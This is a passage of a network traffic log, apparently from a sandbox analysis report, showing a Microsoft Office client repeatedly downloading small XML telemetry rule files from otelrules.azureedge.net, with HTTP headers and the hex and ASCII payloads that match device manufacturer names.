                                34192.168.2.55000113.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:22 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:22 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:22 GMT
                                Content-Type: text/xml
                                Content-Length: 494
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                ETag: "0x8DC582BB8972972"
                                x-ms-request-id: 1e31e9ea-701e-0098-028a-43395f000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165122Z-174f7845968cpnpfhC1EWR3afc00000015u000000000et6k
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:22 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                35192.168.2.55000213.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:23 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:23 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:23 GMT
                                Content-Type: text/xml
                                Content-Length: 420
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                ETag: "0x8DC582B9DAE3EC0"
                                x-ms-request-id: d3507608-601e-003d-4b91-3f6f25000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165123Z-174f7845968ljs8phC1EWRe6en00000015zg00000000q9va
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:23 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                Session IDSource IPSource PortDestination IPDestination Port
                                36192.168.2.55000313.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:23 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:24 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:24 GMT
                                Content-Type: text/xml
                                Content-Length: 472
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                ETag: "0x8DC582B9D43097E"
                                x-ms-request-id: dc0e5a4e-901e-005b-0191-3f2005000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165123Z-174f7845968xr5c2hC1EWRd0hn0000000r2000000000cfhu
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:24 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                37192.168.2.55000413.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:24 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:24 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:24 GMT
                                Content-Type: text/xml
                                Content-Length: 427
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                ETag: "0x8DC582BA909FA21"
                                x-ms-request-id: 5810d2d2-301e-0000-6891-3feecc000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165124Z-174f7845968swgbqhC1EWRmnb400000016f0000000000pgp
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:24 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                Session IDSource IPSource PortDestination IPDestination Port
                                38192.168.2.55000513.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:24 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:25 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:24 GMT
                                Content-Type: text/xml
                                Content-Length: 486
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                ETag: "0x8DC582B92FCB436"
                                x-ms-request-id: fac497c4-501e-008f-4391-3f9054000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165124Z-174f7845968kvnqxhC1EWRmf3g0000000sw000000000xbf5
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:25 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                39192.168.2.55000613.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:24 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:25 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:24 GMT
                                Content-Type: text/xml
                                Content-Length: 423
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                ETag: "0x8DC582BB7564CE8"
                                x-ms-request-id: dc0e6055-901e-005b-2d91-3f2005000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165124Z-174f7845968ljs8phC1EWRe6en00000015y000000000ufxf
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:25 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                Session IDSource IPSource PortDestination IPDestination Port
                                40192.168.2.55000713.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:25 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:26 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:25 GMT
                                Content-Type: text/xml
                                Content-Length: 478
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                ETag: "0x8DC582B9B233827"
                                x-ms-request-id: ef6d0e99-401e-0067-3dc7-4309c2000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165125Z-174f78459685726chC1EWRsnbg000000165000000000tg0x
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:26 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                41192.168.2.55000813.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:26 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:26 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:26 GMT
                                Content-Type: text/xml
                                Content-Length: 404
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                ETag: "0x8DC582B95C61A3C"
                                x-ms-request-id: 50a9aa5a-901e-0015-37fe-41b284000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165126Z-174f78459685m244hC1EWRgp2c00000015z000000000r536
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:26 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                Session IDSource IPSource PortDestination IPDestination Port
                                42192.168.2.55000913.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:26 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:26 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:26 GMT
                                Content-Type: text/xml
                                Content-Length: 468
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                ETag: "0x8DC582BB046B576"
                                x-ms-request-id: be7987d0-001e-0034-1e91-3fdd04000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165126Z-174f7845968psccphC1EWRuz9s00000016fg00000000ahfv
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:26 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                43192.168.2.55001013.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:27 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:27 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:27 GMT
                                Content-Type: text/xml
                                Content-Length: 400
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                ETag: "0x8DC582BB2D62837"
                                x-ms-request-id: 241a7da4-a01e-00ab-50cc-439106000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165127Z-174f7845968psccphC1EWRuz9s00000016b000000000umhe
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:27 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                Session IDSource IPSource PortDestination IPDestination Port
                                44192.168.2.55001113.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:27 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:27 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:27 GMT
                                Content-Type: text/xml
                                Content-Length: 479
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                ETag: "0x8DC582BB7D702D0"
                                x-ms-request-id: 6644a72f-f01e-001f-6d66-435dc8000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165127Z-174f7845968psccphC1EWRuz9s00000016d000000000nd54
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:27 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                45192.168.2.55001213.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:28 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:28 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:28 GMT
                                Content-Type: text/xml
                                Content-Length: 425
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                ETag: "0x8DC582BBA25094F"
                                x-ms-request-id: d2a0c1bd-101e-0017-761b-4147c7000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165128Z-174f7845968xlwnmhC1EWR0sv8000000160000000000k559
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
